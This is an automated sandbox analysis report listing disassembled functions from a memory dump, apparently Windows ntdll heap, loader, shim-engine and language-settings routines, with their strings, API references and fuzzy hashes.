                                                                  control_flow_graph 885 3785fdf4-3785fe16 call 37807be4 888 3785fe35-3785fe4d call 377a7662 885->888 889 3785fe18-3785fe30 RtlDebugPrintTimes 885->889 894 37860277 888->894 895 3785fe53-3785fe69 888->895 893 378602d1-378602e0 889->893 898 3786027a-378602ce call 378602e6 894->898 896 3785fe70-3785fe72 895->896 897 3785fe6b-3785fe6e 895->897 899 3785fe73-3785fe8a 896->899 897->899 898->893 901 3785fe90-3785fe93 899->901 902 37860231-3786023a GetPEB 899->902 901->902 904 3785fe99-3785fea2 901->904 906 3786023c-37860257 GetPEB call 377ab910 902->906 907 37860259-3786025e call 377ab910 902->907 909 3785fea4-3785febb call 377bfed0 904->909 910 3785febe-3785fed1 call 37860835 904->910 912 37860263-37860274 call 377ab910 906->912 907->912 909->910 920 3785fed3-3785feda 910->920 921 3785fedc-3785fef0 call 377a753f 910->921 912->894 920->921 924 3785fef6-3785ff02 GetPEB 921->924 925 37860122-37860127 921->925 926 3785ff04-3785ff07 924->926 927 3785ff70-3785ff7b 924->927 925->898 928 3786012d-37860139 GetPEB 925->928 929 3785ff26-3785ff2b call 377ab910 926->929 930 3785ff09-3785ff24 GetPEB call 377ab910 926->930 933 3785ff81-3785ff88 927->933 934 37860068-3786007a call 377c2710 927->934 931 378601a7-378601b2 928->931 932 3786013b-3786013e 928->932 945 3785ff30-3785ff51 call 377ab910 GetPEB 929->945 930->945 931->898 941 378601b8-378601c3 931->941 936 37860140-3786015b GetPEB call 377ab910 932->936 937 3786015d-37860162 call 377ab910 932->937 933->934 940 3785ff8e-3785ff97 933->940 956 37860110-3786011d call 37860d24 call 37860835 934->956 957 37860080-37860087 934->957 955 37860167-3786017b call 377ab910 936->955 937->955 948 3785ff99-3785ffa9 940->948 949 3785ffb8-3785ffbc 940->949 941->898 942 378601c9-378601d4 941->942 942->898 950 378601da-378601e3 GetPEB 942->950 945->934 975 3785ff57-3785ff6b 945->975 948->949 958 3785ffab-3785ffb5 call 3786d646 948->958 951 3785ffce-3785ffd4 949->951 952 3785ffbe-3785ffcc call 377e3ae9 949->952 959 378601e5-37860200 GetPEB call 377ab910 950->959 960 37860202-37860207 call 377ab910 950->960 962 3785ffd7-3785ffe0 951->962 952->962 987 3786017e-37860188 GetPEB 955->987 956->925 965 37860092-3786009a 957->965 966 37860089-37860090 957->966 958->949 984 3786020c-3786022c call 3785823a call 377ab910 959->984 960->984 973 3785fff2-3785fff5 962->973 974 3785ffe2-3785fff0 962->974 977 3786009c-378600ac 965->977 978 378600b8-378600bc 965->978 966->965 985 3785fff7-3785fffe 973->985 986 37860065 973->986 974->973 975->934 977->978 988 378600ae-378600b3 call 3786d646 977->988 981 378600be-378600d1 call 377e3ae9 978->981 982 378600ec-378600f2 978->982 999 378600e3 981->999 1000 378600d3-378600e1 call 377dfdb9 981->1000 993 378600f5-378600fc 982->993 984->987 985->986 992 37860000-3786000b 985->992 986->934 987->898 994 3786018e-378601a2 987->994 988->978 992->986 997 3786000d-37860016 GetPEB 992->997 993->956 998 378600fe-3786010e 993->998 994->898 1002 37860035-3786003a call 377ab910 997->1002 1003 37860018-37860033 GetPEB call 377ab910 997->1003 998->956 1006 378600e6-378600ea 999->1006 1000->1006 1009 3786003f-3786005d call 3785823a call 377ab910 1002->1009 1003->1009 1006->993 1009->986
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                  • API String ID: 3446177414-1700792311
                                                                  • Opcode ID: 54fa69bc7aa3365be34a7976c7cda9e3086f2fae01f50b3646bb383eb6f91c43
                                                                  • Instruction ID: 1d7341940a3705a11ece7d523e0d87e5695ec399caffcc10ea36fa1f6555d41d
                                                                  • Opcode Fuzzy Hash: 54fa69bc7aa3365be34a7976c7cda9e3086f2fae01f50b3646bb383eb6f91c43
                                                                  • Instruction Fuzzy Hash: 46D10275500689EFDB42CFA8C408FA9BBF2FF59324F048159E544AB762CB39A941CF16
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377AD2EC Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.}7
                                                                  • API String ID: 0-2089972516
                                                                  • Opcode ID: cb51fbb681e6e8cc432646804e91d4eb204f4426ab638cd2dd47eeee4851126f
                                                                  • Instruction ID: ee5f8d82a13fd23081f6f6998bdcf2387d913bc423b55c21898b2eda05687e4c
                                                                  • Opcode Fuzzy Hash: cb51fbb681e6e8cc432646804e91d4eb204f4426ab638cd2dd47eeee4851126f
                                                                  • Instruction Fuzzy Hash: 64B17EB5908341AFE751CF24C884B5FB7E8AB88754F414A2EF894EB344D774D9488B93
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 378586C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                  • API String ID: 0-2515994595
                                                                  • Opcode ID: 75d4e8cbbd0f85865624085d400d35b76c02c153af04bbed24e5015d898521f4
                                                                  • Instruction ID: 6bd7bfa3a869a5819513dbde1759059d9747f59a038963638ef2e3ee427bdefa
                                                                  • Opcode Fuzzy Hash: 75d4e8cbbd0f85865624085d400d35b76c02c153af04bbed24e5015d898521f4
                                                                  • Instruction Fuzzy Hash: 9851C0B5504318ABD321CF18CC84BABB7E8EB943A0F404D1EF9A987241E734D644DBD2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377A640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlDebugPrintTimes.NTDLL ref: 377A651C
                                                                    • Part of subcall function 377A6565: RtlDebugPrintTimes.NTDLL ref: 377A6614
                                                                    • Part of subcall function 377A6565: RtlDebugPrintTimes.NTDLL ref: 377A665F
                                                                  Strings
                                                                  • apphelp.dll, xrefs: 377A6446
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 378097A0, 378097C9
                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 37809790
                                                                  • LdrpInitShimEngine, xrefs: 37809783, 37809796, 378097BF
                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 378097B9
                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3780977C
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-204845295
                                                                  • Opcode ID: 33401ecd5b6f01cb4d8230c24c1485827afd6d86773026f708a689be4764caeb
                                                                  • Instruction ID: a2104451ab64f5f78618c62ed1aea07e75d63d8559c05784956bdea934dd598e
                                                                  • Opcode Fuzzy Hash: 33401ecd5b6f01cb4d8230c24c1485827afd6d86773026f708a689be4764caeb
                                                                  • Instruction Fuzzy Hash: 3C51C071249304AFE360DF24DC89BAB7BE8EB84754F400929F5949B650DB34E905CF93
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377DD6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlDebugPrintTimes.NTDLL ref: 377DD879
                                                                    • Part of subcall function 377B4779: RtlDebugPrintTimes.NTDLL ref: 377B4817
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-1975516107
                                                                  • Opcode ID: 5b1b19b91710310258630636bb97ea98f4e20f7104b1e259b867cf789005bb4e
                                                                  • Instruction ID: c9a6df6d6316346f0facc72afb66aa37887c4a605ae62cead69a434059c706f0
                                                                  • Opcode Fuzzy Hash: 5b1b19b91710310258630636bb97ea98f4e20f7104b1e259b867cf789005bb4e
                                                                  • Instruction Fuzzy Hash: 2651F175A45346DFEB45CFA4C48979DBBF2BF48324F6040AAC4007F281D778A986CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3785F51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                  • API String ID: 0-2224505338
                                                                  • Opcode ID: ce4da1bc0ab9b3800921046138404a6791d6fb35702414527ef22e1dd5fb1bdb
                                                                  • Instruction ID: 03dd5b541a65f9ddb1191c145058edca5299da1862adb8b53f2e884a105ec604
                                                                  • Opcode Fuzzy Hash: ce4da1bc0ab9b3800921046138404a6791d6fb35702414527ef22e1dd5fb1bdb
                                                                  • Instruction Fuzzy Hash: 6751E27A151288EFE781CF54D888F6AB7E4EF047B4F108599F4019F221CB39EA50CE12
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 37838633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • VerifierDebug, xrefs: 37838925
                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 378386BD
                                                                  • VerifierFlags, xrefs: 378388D0
                                                                  • HandleTraces, xrefs: 3783890F
                                                                  • VerifierDlls, xrefs: 3783893D
                                                                  • AVRF: -*- final list of providers -*- , xrefs: 3783880F
                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 378386E7
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                  • API String ID: 0-3223716464
                                                                  • Opcode ID: 6a22bf88ee5d33f4780654a4bde2337693cfb3640dbf3059929b3ffae7ac88b4
                                                                  • Instruction ID: 7c326476fc77876336ba23f96e437a61ee95993de20bf3a279747faca7a51c1f
                                                                  • Opcode Fuzzy Hash: 6a22bf88ee5d33f4780654a4bde2337693cfb3640dbf3059929b3ffae7ac88b4
                                                                  • Instruction Fuzzy Hash: CE91227A647311AFF311CF2CC880B5A7BA9AB64714F450968F850AF241C738E845DBE2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377D237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 3781A7AF
                                                                  • LdrpDynamicShimModule, xrefs: 3781A7A5
                                                                  • DGx7, xrefs: 377D2382
                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3781A79F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DGx7$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-3766782692
                                                                  • Opcode ID: f13d25125dba51a6b559b0c8dd4c549a531b24293f8614c2c4d1d8cc8e8bf33e
                                                                  • Instruction ID: 37d2c9ec2155b06332bb63867344f9c86de7099214c6f18a2966f2399fd8f63c
                                                                  • Opcode Fuzzy Hash: f13d25125dba51a6b559b0c8dd4c549a531b24293f8614c2c4d1d8cc8e8bf33e
                                                                  • Instruction Fuzzy Hash: E2313975A41300EFE7909F58C8C5BAD7BB5EB94750F140069E811BB650DBB89943CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377AF113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-523794902
                                                                  • Opcode ID: 40619a10b934848061141316aeaac99054d68634845af5e9a98b61e1a6b22caf
                                                                  • Instruction ID: 8061f211e54594ca986b56f6a9923317cde8032d24351bb18d340e64a8cc2da6
                                                                  • Opcode Fuzzy Hash: 40619a10b934848061141316aeaac99054d68634845af5e9a98b61e1a6b22caf
                                                                  • Instruction Fuzzy Hash: 9942DF75205341EFE345CF28C888B2ABBE5FF98358F044A69E8959B351DB34E942CF52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377D510F Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.}7
                                                                  • API String ID: 0-2755375954
                                                                  • Opcode ID: b1ec63d1378b13884b86eca734943594874acb3147539880dd6a3c2e2b07ef05
                                                                  • Instruction ID: fca3f190e041fa56e88c3a5b20d6a105481482edc801c724a2dfaf7d263f39b2
                                                                  • Opcode Fuzzy Hash: b1ec63d1378b13884b86eca734943594874acb3147539880dd6a3c2e2b07ef05
                                                                  • Instruction Fuzzy Hash: 0CF15EB6D01219EFDB01CF99C984ADEBBB9FF09790F50406AE505EB210EB759E01CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-792281065
                                                                  • Opcode ID: 381a6584c99ebf9f77ae4b700082e59c339947beef2388a6d7cfc586f4a56a74
                                                                  • Instruction ID: 483d450222eb95ce898bd47446feb76e2bdc489029fb631b98947cecf8cf7af4
                                                                  • Opcode Fuzzy Hash: 381a6584c99ebf9f77ae4b700082e59c339947beef2388a6d7cfc586f4a56a74
                                                                  • Instruction Fuzzy Hash: 32915A74A03314DFEB64CF18D849BAD7BB5EF15765F000129E914BFA80DB785882DB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377EC5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 377EC5E3
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 37827F8C, 37828000
                                                                  • Loading import redirection DLL: '%wZ', xrefs: 37827F7B
                                                                  • LdrpInitializeProcess, xrefs: 377EC5E4
                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 37827FF0
                                                                  • LdrpInitializeImportRedirection, xrefs: 37827F82, 37827FF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 0-475462383
                                                                  • Opcode ID: aa3a8983851756571c8a5e5cf6f0c728fff78d79a8c036bb5922a0563d5b054b
                                                                  • Instruction ID: 48826563acfbdcd746dae83538af14ef62adb9e2198479a8399dbd5feafbd840
                                                                  • Opcode Fuzzy Hash: aa3a8983851756571c8a5e5cf6f0c728fff78d79a8c036bb5922a0563d5b054b
                                                                  • Instruction Fuzzy Hash: 6231E375605341AFD314DF28D949E2ABBE9EF99720F010568F984AF391E724EC05CBA3
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E2594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 37821FA9
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 37821F82
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 37821FC9
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 37821F8A
                                                                  • SXS: %s() passed the empty activation context, xrefs: 37821F6F
                                                                  • RtlGetAssemblyStorageRoot, xrefs: 37821F6A, 37821FA4, 37821FC4
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                  • API String ID: 0-861424205
                                                                  • Opcode ID: 0ff763b112def1e535e69d5998ac27414e81caa246e923c57f831eca3855e23b
                                                                  • Instruction ID: b3854fc77e780fb38eda074c00fc76f8f5ad5331eb597fd6b0d8f66fff0dfd49
                                                                  • Opcode Fuzzy Hash: 0ff763b112def1e535e69d5998ac27414e81caa246e923c57f831eca3855e23b
                                                                  • Instruction Fuzzy Hash: 1B310676E012147FF7108A8A9C44FAB766CEF55754F1145A9FA106B644C770EA408BE2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377C0680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-4253913091
                                                                  • Opcode ID: 64994fa89d5821e9faf0f93a6da4351df2861e26ed1cc76a9bff4f7bd8d6638e
                                                                  • Instruction ID: a5008ad2172103dbe0b2a23589a99e8ac0de75b99de9b7b430c38b562a598446
                                                                  • Opcode Fuzzy Hash: 64994fa89d5821e9faf0f93a6da4351df2861e26ed1cc76a9bff4f7bd8d6638e
                                                                  • Instruction Fuzzy Hash: 5BF1AA74A0160ADFEB04CF68C984B6AB7F6FF48354F1085A9E415AB381DB34E981CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377D9723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                  • API String ID: 3446177414-2283098728
                                                                  • Opcode ID: c04e4232d1b9fdcc03d68a9f8f21f6ea2691ab56c937dc22f41b95bdac07bb42
                                                                  • Instruction ID: 13d1d64f56a6fa3f2744128ea25377e075e20b1a4e222de1f9b3babe3b8ad17d
                                                                  • Opcode Fuzzy Hash: c04e4232d1b9fdcc03d68a9f8f21f6ea2691ab56c937dc22f41b95bdac07bb42
                                                                  • Instruction Fuzzy Hash: 275101747003019BE714DF38C888B2A77A2FB89724F140A6DE4519F691EB38A841CF93
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377EC640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 378280F3
                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 378280E9
                                                                  • Failed to reallocate the system dirs string !, xrefs: 378280E2
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-1783798831
                                                                  • Opcode ID: 5ac3880bbb9ccea92de451990046ed20ef84a01935e60ec9817ebc4c1a3abbd5
